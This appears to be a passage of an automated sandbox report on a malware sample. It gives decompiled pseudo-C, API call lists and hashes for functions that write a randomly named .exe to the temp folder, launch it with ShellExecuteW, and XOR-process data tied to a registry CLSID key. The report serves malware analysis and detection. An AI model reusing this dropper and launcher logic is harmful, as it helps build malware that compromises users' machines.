                                                                                              0x04289c8f
                                                                                              0x04289c92
                                                                                              0x04289c95
                                                                                              0x04289c95
                                                                                              0x04289c0c
                                                                                              0x04289c0f
                                                                                              0x04289c11
                                                                                              0x00000000
                                                                                              0x04289c13
                                                                                              0x04289c13
                                                                                              0x04289c16
                                                                                              0x04289c17
                                                                                              0x04289c18
                                                                                              0x04289c19
                                                                                              0x04289c1e
                                                                                              0x04289c11
                                                                                              0x04289c9d
                                                                                              0x04289ca2
                                                                                              0x04289cad
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289b7b
                                                                                              0x04289b4f
                                                                                              0x04289b51
                                                                                              0x04289bad
                                                                                              0x04289bb1
                                                                                              0x04289bb1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289ae6
                                                                                              0x04289ae9
                                                                                              0x04289aec
                                                                                              0x04289aef
                                                                                              0x04289af2
                                                                                              0x04289af5
                                                                                              0x04289af8
                                                                                              0x04289af8
                                                                                              0x00000000
                                                                                              0x04289ab5
                                                                                              0x04289a97
                                                                                              0x04289a97
                                                                                              0x04289b03
                                                                                              0x04289b05
                                                                                              0x00000000
                                                                                              0x04289b0a
                                                                                              0x042899d9
                                                                                              0x042899d9
                                                                                              0x042899dc
                                                                                              0x042899e5
                                                                                              0x042899e8
                                                                                              0x042899ef
                                                                                              0x042899f1
                                                                                              0x04289a0a
                                                                                              0x04289a0b
                                                                                              0x04289a0c
                                                                                              0x04289a0e
                                                                                              0x04289a13
                                                                                              0x042899f3
                                                                                              0x042899f3
                                                                                              0x042899f6
                                                                                              0x042899f7
                                                                                              0x042899f9
                                                                                              0x042899fb
                                                                                              0x042899fd
                                                                                              0x04289a02
                                                                                              0x04289a02
                                                                                              0x04289a16
                                                                                              0x04289a18
                                                                                              0x04289a1a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04289a20
                                                                                              0x04289a23
                                                                                              0x04289a25
                                                                                              0x04289a27
                                                                                              0x00000000
                                                                                              0x04289a29
                                                                                              0x04289a29
                                                                                              0x04289a2c
                                                                                              0x00000000
                                                                                              0x04289a2c
                                                                                              0x00000000
                                                                                              0x04289a27
                                                                                              0x04289b0b
                                                                                              0x04289b0e
                                                                                              0x04289b13
                                                                                              0x00000000
                                                                                              0x04289b16
                                                                                              0x042899a9
                                                                                              0x042899a9
                                                                                              0x042899b0
                                                                                              0x042899b1
                                                                                              0x042899b3
                                                                                              0x042899b8
                                                                                              0x04289b17
                                                                                              0x04289b1b
                                                                                              0x04289b1b
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 04289B05
                                                                                                • Part of subcall function 0427EF13: IsProcessorFeaturePresent.KERNEL32(00000017,0427EEE5,00000000,00000001,00000004,00000000,00000001,00000001,?,?,0427EEF2,00000000,00000000,00000000,00000000,00000000), ref: 0427EF15
                                                                                                • Part of subcall function 0427EF13: GetCurrentProcess.KERNEL32(C0000417,00000001), ref: 0427EF37
                                                                                                • Part of subcall function 0427EF13: TerminateProcess.KERNEL32(00000000), ref: 0427EF3E
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                              • String ID: *?$.
                                                                                              • API String ID: 2667617558-3972193922
                                                                                              • Opcode ID: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                                                              • Instruction ID: 93a734717f5d26eb2dfd6c04ccec19a7689c67f566659c554ccc4177c500e5ea
                                                                                              • Opcode Fuzzy Hash: 77f52ca0845749342b5189b1e5290ed6d38713f7e75f0feb82b1dd4567dae4a6
                                                                                              • Instruction Fuzzy Hash: 9F5191B1F1120AAFDF14EFA8C880ABDB7B5EF88314F25816DD454E7380E671AA41CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 34%
                                                                                              			E04259D70(void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				signed int _v9;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v20;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v21;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v24;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v25;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v28;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v29;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v44;
                                                                                              				char _v48;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v52;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v56;
                                                                                              				intOrPtr _v60;
                                                                                              				intOrPtr _v61;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v64;
                                                                                              				intOrPtr _v68;
                                                                                              				intOrPtr _v69;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v72;
                                                                                              				intOrPtr _v73;
                                                                                              				struct _SECURITY_ATTRIBUTES* _v76;
                                                                                              				intOrPtr _v81;
                                                                                              				intOrPtr* _v92;
                                                                                              				char _v108;
                                                                                              				char _v109;
                                                                                              				void* _v112;
                                                                                              				void* _v113;
                                                                                              				char* _v116;
                                                                                              				char _v120;
                                                                                              				intOrPtr _v121;
                                                                                              				char _v124;
                                                                                              				signed int _t44;
                                                                                              				void* _t52;
                                                                                              				void** _t69;
                                                                                              				intOrPtr* _t71;
                                                                                              				intOrPtr _t72;
                                                                                              				signed int _t81;
                                                                                              				signed int _t83;
                                                                                              				signed int _t84;
                                                                                              
                                                                                              				_t83 = (_t81 & 0xfffffff8) - 0x7c;
                                                                                              				_t44 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t44 ^ _t83;
                                                                                              				E04257980( &_v108);
                                                                                              				_v68 = 0x429e048;
                                                                                              				_v64 = 0;
                                                                                              				_v60 = 0x429e024;
                                                                                              				_v56 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v76 = 0;
                                                                                              				_v72 = 0;
                                                                                              				_v52 = 0;
                                                                                              				_v48 = 0x43;
                                                                                              				E04258AE0( &_v108,  *0x42a78d4 & 0x0000ffff);
                                                                                              				_t69 =  &_v112;
                                                                                              				_t84 = _t83 - 0xc;
                                                                                              				_push( *0x42a4760 & 0x0000ffff);
                                                                                              				_push(0x42a78d8);
                                                                                              				if(E04258BB0(_t69) != 0) {
                                                                                              					_v120 = 0x429e8b0;
                                                                                              					_v116 =  &_v108;
                                                                                              					_v52 =  &_v120;
                                                                                              					_t52 = CreateEventW(0, 1, 0, 0);
                                                                                              					_push(_t69);
                                                                                              					_push(0x3f);
                                                                                              					_v112 = _t52;
                                                                                              					_push(1);
                                                                                              					_push( &_v124);
                                                                                              					_v120 = 0x429ecbc;
                                                                                              					_v124 = 0x86;
                                                                                              					E04251C60(_v116);
                                                                                              					_t71 = _v92;
                                                                                              					if(_t71 != 0) {
                                                                                              						 *((intOrPtr*)( *_t71 + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_t72 = _v73;
                                                                                              					if(_t72 != 0) {
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)(_t72 + 4)) + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_v121 = 0x429e8b0;
                                                                                              					CloseHandle(_v113);
                                                                                              					_v121 = 0x429e8c0;
                                                                                              				}
                                                                                              				E04258C90( &_v109);
                                                                                              				_t57 = _v29;
                                                                                              				if(_v29 != 0) {
                                                                                              					E04275B0F(_t57);
                                                                                              					_t84 = _t84 + 4;
                                                                                              				}
                                                                                              				_t58 = _v81;
                                                                                              				_v21 = 0;
                                                                                              				_v29 = 0;
                                                                                              				_v25 = 0;
                                                                                              				_v61 = 0x429df88;
                                                                                              				_v69 = 0x429e008;
                                                                                              				if(_v81 != 0) {
                                                                                              					E04275B0F(_t58);
                                                                                              					_t84 = _t84 + 4;
                                                                                              				}
                                                                                              				return E04275AFE(_v9 ^ _t84);
                                                                                              			}









































                                                                                              0x04259d76
                                                                                              0x04259d79
                                                                                              0x04259d80
                                                                                              0x04259d90
                                                                                              0x04259d9a
                                                                                              0x04259da2
                                                                                              0x04259daa
                                                                                              0x04259db2
                                                                                              0x04259dba
                                                                                              0x04259dc2
                                                                                              0x04259dca
                                                                                              0x04259dd2
                                                                                              0x04259dda
                                                                                              0x04259de2
                                                                                              0x04259dea
                                                                                              0x04259df2
                                                                                              0x04259df7
                                                                                              0x04259e03
                                                                                              0x04259e07
                                                                                              0x04259e0a
                                                                                              0x04259e0b
                                                                                              0x04259e17
                                                                                              0x04259e29
                                                                                              0x04259e31
                                                                                              0x04259e3d
                                                                                              0x04259e41
                                                                                              0x04259e47
                                                                                              0x04259e4c
                                                                                              0x04259e4e
                                                                                              0x04259e56
                                                                                              0x04259e58
                                                                                              0x04259e59
                                                                                              0x04259e61
                                                                                              0x04259e66
                                                                                              0x04259e6b
                                                                                              0x04259e71
                                                                                              0x04259e77
                                                                                              0x04259e77
                                                                                              0x04259e7a
                                                                                              0x04259e80
                                                                                              0x04259e8a
                                                                                              0x04259e8a
                                                                                              0x04259e93
                                                                                              0x04259e9b
                                                                                              0x04259ea1
                                                                                              0x04259ea1
                                                                                              0x04259ead
                                                                                              0x04259eb2
                                                                                              0x04259eb8
                                                                                              0x04259ebb
                                                                                              0x04259ec0
                                                                                              0x04259ec0
                                                                                              0x04259ec3
                                                                                              0x04259ec7
                                                                                              0x04259ecf
                                                                                              0x04259ed7
                                                                                              0x04259edf
                                                                                              0x04259ee7
                                                                                              0x04259ef1
                                                                                              0x04259ef4
                                                                                              0x04259ef9
                                                                                              0x04259ef9
                                                                                              0x04259f0d

                                                                                              APIs
                                                                                                • Part of subcall function 04257980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0426B836), ref: 042579B0
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 042579C2
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 042579D5
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 042579E8
                                                                                              • CreateEventW.KERNEL32(00000000,00000001), ref: 04259E41
                                                                                              • CloseHandle.KERNEL32(0429E8B0,00000000,00000001,0000003F), ref: 04259E9B
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CloseCreateEventHandleLibraryLoad
                                                                                              • String ID: C
                                                                                              • API String ID: 1850149996-1037565863
                                                                                              • Opcode ID: 16ce02fa22a6d004c63b0be061ad29a9f1eedf653178d5bfe9f7eed4b015751e
                                                                                              • Instruction ID: 1736e57004ace2109816dd18984b59cbfb08f7d0070a6d31f66903da59169d24
                                                                                              • Opcode Fuzzy Hash: 16ce02fa22a6d004c63b0be061ad29a9f1eedf653178d5bfe9f7eed4b015751e
                                                                                              • Instruction Fuzzy Hash: 77413AB16283419FE710DF64D458B1BBBE4BF84714F100A1DF9A19A2E0D7B5E948CB93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 41%
                                                                                              			E04259820(void* __esi, void* __eflags) {
                                                                                              				void* _v5;
                                                                                              				signed int _v8;
                                                                                              				void* _v17;
                                                                                              				char _v20;
                                                                                              				void* _v21;
                                                                                              				char _v24;
                                                                                              				void* _v25;
                                                                                              				char _v28;
                                                                                              				char _v44;
                                                                                              				char _v48;
                                                                                              				char _v52;
                                                                                              				char _v56;
                                                                                              				void* _v57;
                                                                                              				intOrPtr _v60;
                                                                                              				char _v64;
                                                                                              				void* _v65;
                                                                                              				intOrPtr _v68;
                                                                                              				void* _v69;
                                                                                              				char _v72;
                                                                                              				char _v76;
                                                                                              				void* _v77;
                                                                                              				intOrPtr* _v80;
                                                                                              				void* _v105;
                                                                                              				char _v108;
                                                                                              				void* _v109;
                                                                                              				void* _v112;
                                                                                              				void* _v113;
                                                                                              				void* _v117;
                                                                                              				void* _v125;
                                                                                              				char _v128;
                                                                                              				signed int _t39;
                                                                                              				intOrPtr* _t66;
                                                                                              				intOrPtr _t67;
                                                                                              				intOrPtr* _t68;
                                                                                              				signed int _t77;
                                                                                              				signed int _t79;
                                                                                              				signed int _t80;
                                                                                              
                                                                                              				_t79 = (_t77 & 0xfffffff8) - 0x7c;
                                                                                              				_t39 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t39 ^ _t79;
                                                                                              				E04257980( &_v108);
                                                                                              				_v68 = 0x429e048;
                                                                                              				_v64 = 0;
                                                                                              				_v60 = 0x429e024;
                                                                                              				_v56 = 0;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v44 = 0;
                                                                                              				_v76 = 0;
                                                                                              				_v72 = 0;
                                                                                              				_v52 = 0;
                                                                                              				_v48 = 0x43;
                                                                                              				E04258AE0( &_v108,  *0x42a78d4 & 0x0000ffff);
                                                                                              				_t80 = _t79 - 0xc;
                                                                                              				_push( *0x42a4760 & 0x0000ffff);
                                                                                              				_push(0x42a78d8);
                                                                                              				if(E04258BB0( &_v112) != 0) {
                                                                                              					E04252000( &_v128,  &_v108);
                                                                                              					_t66 = _v80;
                                                                                              					if(_t66 != 0) {
                                                                                              						 *((intOrPtr*)( *_t66 + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_t67 = _v72;
                                                                                              					if(_t67 != 0) {
                                                                                              						 *((intOrPtr*)( *((intOrPtr*)(_t67 + 4)) + 0x14))(0xffffffff);
                                                                                              					}
                                                                                              					_v128 = 0x429d858;
                                                                                              					 *0x42a78c8 = 0;
                                                                                              					WaitForSingleObject(_v112, 0xffffffff);
                                                                                              					_t68 =  *((intOrPtr*)(_t80 + 0x10));
                                                                                              					if(_t68 != 0) {
                                                                                              						 *((intOrPtr*)( *_t68))(1);
                                                                                              					}
                                                                                              					_v128 = 0x429e8b0;
                                                                                              					CloseHandle( *(_t80 + 0xc));
                                                                                              					_v128 = 0x429e8c0;
                                                                                              				}
                                                                                              				E04258C90( &_v108);
                                                                                              				_t50 = _v28;
                                                                                              				if(_v28 != 0) {
                                                                                              					E04275B0F(_t50);
                                                                                              					_t80 = _t80 + 4;
                                                                                              				}
                                                                                              				_t51 = _v80;
                                                                                              				_v20 = 0;
                                                                                              				_v28 = 0;
                                                                                              				_v24 = 0;
                                                                                              				_v60 = 0x429df88;
                                                                                              				_v68 = 0x429e008;
                                                                                              				if(_v80 != 0) {
                                                                                              					E04275B0F(_t51);
                                                                                              					_t80 = _t80 + 4;
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t80);
                                                                                              			}








































                                                                                              0x04259826
                                                                                              0x04259829
                                                                                              0x04259830
                                                                                              0x04259840
                                                                                              0x0425984a
                                                                                              0x04259852
                                                                                              0x0425985a
                                                                                              0x04259862
                                                                                              0x0425986a
                                                                                              0x04259872
                                                                                              0x0425987a
                                                                                              0x04259882
                                                                                              0x0425988a
                                                                                              0x04259892
                                                                                              0x0425989a
                                                                                              0x042598a2
                                                                                              0x042598a7
                                                                                              0x042598b7
                                                                                              0x042598ba
                                                                                              0x042598bb
                                                                                              0x042598c7
                                                                                              0x042598d7
                                                                                              0x042598dc
                                                                                              0x042598e2
                                                                                              0x042598e8
                                                                                              0x042598e8
                                                                                              0x042598eb
                                                                                              0x042598f1
                                                                                              0x042598fb
                                                                                              0x042598fb
                                                                                              0x04259906
                                                                                              0x0425990e
                                                                                              0x04259915
                                                                                              0x0425991b
                                                                                              0x04259921
                                                                                              0x04259927
                                                                                              0x04259927
                                                                                              0x0425992d
                                                                                              0x04259935
                                                                                              0x0425993b
                                                                                              0x0425993b
                                                                                              0x04259947
                                                                                              0x0425994c
                                                                                              0x04259952
                                                                                              0x04259955
                                                                                              0x0425995a
                                                                                              0x0425995a
                                                                                              0x0425995d
                                                                                              0x04259961
                                                                                              0x04259969
                                                                                              0x04259971
                                                                                              0x04259979
                                                                                              0x04259981
                                                                                              0x0425998b
                                                                                              0x0425998e
                                                                                              0x04259993
                                                                                              0x04259993
                                                                                              0x042599a7

                                                                                              APIs
                                                                                                • Part of subcall function 04257980: LoadLibraryA.KERNEL32(ntdll.dll,00000000,?,00000000,0426B836), ref: 042579B0
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlGetCompressionWorkSpaceSize), ref: 042579C2
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlCompressBuffer), ref: 042579D5
                                                                                                • Part of subcall function 04257980: GetProcAddress.KERNEL32(00000000,RtlDecompressBuffer), ref: 042579E8
                                                                                              • WaitForSingleObject.KERNEL32(?), ref: 04259915
                                                                                              • CloseHandle.KERNEL32(0429D858), ref: 04259935
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$CloseHandleLibraryLoadObjectSingleWait
                                                                                              • String ID: C
                                                                                              • API String ID: 2253563908-1037565863
                                                                                              • Opcode ID: 8ede875d143090ff96fc2c728a134c3daff1230e0a63b002a550ba379656d407
                                                                                              • Instruction ID: d2a1a857e28ffe480892efb1491b82ab1ed80fba7b89818cd4f91feacc135f55
                                                                                              • Opcode Fuzzy Hash: 8ede875d143090ff96fc2c728a134c3daff1230e0a63b002a550ba379656d407
                                                                                              • Instruction Fuzzy Hash: 244128B06283419FE710DF68D45872BBBE4EF81358F104A1CF9A18A2E0D775E848CB93
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E0425E360(intOrPtr* _a4) {
                                                                                              				void* _t22;
                                                                                              				short* _t27;
                                                                                              				intOrPtr _t37;
                                                                                              				void* _t39;
                                                                                              				intOrPtr* _t41;
                                                                                              
                                                                                              				_t41 = _a4;
                                                                                              				_t39 = 0;
                                                                                              				 *(_t41 + 0x24) = 1;
                                                                                              				if( *((intOrPtr*)( *_t41 + 0x18)) <= 0) {
                                                                                              					L4:
                                                                                              					if( *((intOrPtr*)(_t41 + 0x14)) != 0) {
                                                                                              						_t37 =  *_t41;
                                                                                              						_t50 =  *((intOrPtr*)(_t37 + 0x24));
                                                                                              						if( *((intOrPtr*)(_t37 + 0x24)) > 0) {
                                                                                              							_t27 = E0425E0C0(( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff), _t37, _t50, ( *(_t37 + 0x4d) & 0x000000ff) + ( *(_t37 + 0x4c) & 0x000000ff) + ( *(_t37 + 0x4b) & 0x000000ff) + ( *(_t37 + 0x4a) & 0x000000ff));
                                                                                              							E0425E5C0(_t41);
                                                                                              							_t22 = E0425E040(_t27,  *((intOrPtr*)(_t41 + 0x14)),  *((intOrPtr*)( *_t41 + 0x24)));
                                                                                              							E0425E5C0(_t41);
                                                                                              							if(_t22 != 0) {
                                                                                              								ShellExecuteW(0, L"open", _t27,  *(_t41 + 0xc), 0, 1);
                                                                                              							}
                                                                                              							E04275B0F(_t27);
                                                                                              						}
                                                                                              					}
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					while(1) {
                                                                                              						Sleep(0x3e8);
                                                                                              						_t39 = _t39 + 1;
                                                                                              						if( *(_t41 + 0x24) == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						if(_t39 <  *((intOrPtr*)( *_t41 + 0x18))) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						goto L4;
                                                                                              					}
                                                                                              					L9:
                                                                                              					return 0;
                                                                                              				}
                                                                                              			}








                                                                                              0x0425e365
                                                                                              0x0425e369
                                                                                              0x0425e36d
                                                                                              0x0425e377
                                                                                              0x0425e395
                                                                                              0x0425e399
                                                                                              0x0425e39b
                                                                                              0x0425e39d
                                                                                              0x0425e3a1
                                                                                              0x0425e3c4
                                                                                              0x0425e3c6
                                                                                              0x0425e3d5
                                                                                              0x0425e3e1
                                                                                              0x0425e3e8
                                                                                              0x0425e3f9
                                                                                              0x0425e3f9
                                                                                              0x0425e400
                                                                                              0x0425e405
                                                                                              0x0425e3a1
                                                                                              0x00000000
                                                                                              0x0425e379
                                                                                              0x0425e380
                                                                                              0x0425e385
                                                                                              0x0425e387
                                                                                              0x0425e38c
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e393
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425e393
                                                                                              0x0425e40a
                                                                                              0x0425e40e
                                                                                              0x0425e40e

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(000003E8), ref: 0425E385
                                                                                              • ShellExecuteW.SHELL32(00000000,open,00000000,00000001,00000000,00000001), ref: 0425E3F9
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExecuteShellSleep
                                                                                              • String ID: open
                                                                                              • API String ID: 4194306370-2758837156
                                                                                              • Opcode ID: c9d6b7333f2d97015dbca724ce9c96b783f22e5cdd6f6399a78c5160affa43ef
                                                                                              • Instruction ID: 489c04bd91d9b6506aef0074bc9d77187dabc3da2987790452028ef2a554df3d
                                                                                              • Opcode Fuzzy Hash: c9d6b7333f2d97015dbca724ce9c96b783f22e5cdd6f6399a78c5160affa43ef
                                                                                              • Instruction Fuzzy Hash: F9110B71320240AFF7209F68D854B3AB7E5AF48309F150869E9894B291E675FE41CBA5
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E0425E0C0(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4) {
                                                                                              				char* _v8;
                                                                                              				void* __esi;
                                                                                              				signed int _t26;
                                                                                              				WCHAR* _t28;
                                                                                              				WCHAR* _t32;
                                                                                              				signed int _t35;
                                                                                              				void* _t36;
                                                                                              				signed int _t40;
                                                                                              				void* _t44;
                                                                                              				signed short* _t45;
                                                                                              				signed int _t53;
                                                                                              
                                                                                              				_t36 = __edx;
                                                                                              				_t34 = __ecx;
                                                                                              				_push(__ecx);
                                                                                              				_push(0x208);
                                                                                              				_v8 = L".exe";
                                                                                              				_t32 = E04275B55(__ecx, L".exe", __eflags);
                                                                                              				 *_t32 = 0;
                                                                                              				_t40 = GetTempPathW(0x104, _t32);
                                                                                              				if(_t40 != 0 &&  *((short*)(_t32 + _t40 * 2 - 2)) != 0x5c) {
                                                                                              					_t32[_t40] = 0x5c;
                                                                                              					_t40 = _t40 + 1;
                                                                                              					_t53 = _t40;
                                                                                              				}
                                                                                              				E0427EF67(_t34, E0427F548(_t34, _t36, _t53, 0) + _a4);
                                                                                              				_t44 = 8;
                                                                                              				do {
                                                                                              					_t26 = E0427EF46(_t34);
                                                                                              					asm("cdq");
                                                                                              					_t40 = _t40 + 1;
                                                                                              					_t34 = 0x1a;
                                                                                              					 *((short*)(_t32 + _t40 * 2 - 2)) = _t26 % 0x1a + 0x61;
                                                                                              					_t44 = _t44 - 1;
                                                                                              				} while (_t44 != 0);
                                                                                              				_t45 = _v8;
                                                                                              				_t28 =  &(_t32[_t40]);
                                                                                              				_t35 = 0x2e;
                                                                                              				do {
                                                                                              					 *_t28 = _t35;
                                                                                              					_t45 =  &(_t45[1]);
                                                                                              					_t35 =  *_t45 & 0x0000ffff;
                                                                                              					_t28 =  &(_t28[1]);
                                                                                              				} while (_t35 != 0);
                                                                                              				return _t32;
                                                                                              			}














                                                                                              0x0425e0c0
                                                                                              0x0425e0c0
                                                                                              0x0425e0c3
                                                                                              0x0425e0cc
                                                                                              0x0425e0d1
                                                                                              0x0425e0dc
                                                                                              0x0425e0e4
                                                                                              0x0425e0f0
                                                                                              0x0425e0f4
                                                                                              0x0425e103
                                                                                              0x0425e107
                                                                                              0x0425e107
                                                                                              0x0425e107
                                                                                              0x0425e113
                                                                                              0x0425e11b
                                                                                              0x0425e120
                                                                                              0x0425e120
                                                                                              0x0425e125
                                                                                              0x0425e126
                                                                                              0x0425e129
                                                                                              0x0425e133
                                                                                              0x0425e138
                                                                                              0x0425e138
                                                                                              0x0425e13d
                                                                                              0x0425e140
                                                                                              0x0425e143
                                                                                              0x0425e150
                                                                                              0x0425e150
                                                                                              0x0425e153
                                                                                              0x0425e156
                                                                                              0x0425e159
                                                                                              0x0425e15c
                                                                                              0x0425e169

                                                                                              APIs
                                                                                              • GetTempPathW.KERNEL32(00000104,00000000), ref: 0425E0EA
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: PathTemp
                                                                                              • String ID: .exe$\
                                                                                              • API String ID: 2920410445-2920562713
                                                                                              • Opcode ID: 05b0bc7bcb70e42aa67c50b7928e9b5630a0d27e7f7ef3317a4031bb34433cd6
                                                                                              • Instruction ID: 1c0147a72d6fb38e40787a1e709941c9416a3341ae552c8d90abdea21f13ca7e
                                                                                              • Opcode Fuzzy Hash: 05b0bc7bcb70e42aa67c50b7928e9b5630a0d27e7f7ef3317a4031bb34433cd6
                                                                                              • Instruction Fuzzy Hash: 36114872B2420A9BEB106F94CC45B6677B4EF41315F0681B9ED086B390EBB0BD0487E1
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E04269620(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				signed int _t17;
                                                                                              				signed int* _t23;
                                                                                              				intOrPtr _t32;
                                                                                              				void* _t35;
                                                                                              				void* _t36;
                                                                                              				signed int* _t41;
                                                                                              				intOrPtr* _t43;
                                                                                              				signed int _t44;
                                                                                              
                                                                                              				_t17 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t17 ^ _t44;
                                                                                              				_t43 = __ecx;
                                                                                              				E04266050(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_t23 = E04260C60(0x80000002,  &_v608, L"Global", _t43);
                                                                                              				_t32 =  *_t43;
                                                                                              				_t41 = _t23;
                                                                                              				if(_t32 > 1) {
                                                                                              					_t35 = _t32 - 1;
                                                                                              					 *(_t35 + _t41) =  *(_t35 + _t41) ^  *_t41;
                                                                                              					_t36 = _t35 - 1;
                                                                                              					while(_t36 != 0) {
                                                                                              						 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                                                              						_t36 = _t36 - 1;
                                                                                              					}
                                                                                              					 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                                                              				}
                                                                                              				return E04275AFE(_v8 ^ _t44);
                                                                                              			}














                                                                                              0x04269629
                                                                                              0x04269630
                                                                                              0x04269634
                                                                                              0x0426963f
                                                                                              0x04269654
                                                                                              0x0426966a
                                                                                              0x0426966f
                                                                                              0x04269674
                                                                                              0x04269679
                                                                                              0x0426967d
                                                                                              0x0426967e
                                                                                              0x04269681
                                                                                              0x04269684
                                                                                              0x0426968a
                                                                                              0x0426968d
                                                                                              0x0426968d
                                                                                              0x04269696
                                                                                              0x04269699
                                                                                              0x042696aa

                                                                                              APIs
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
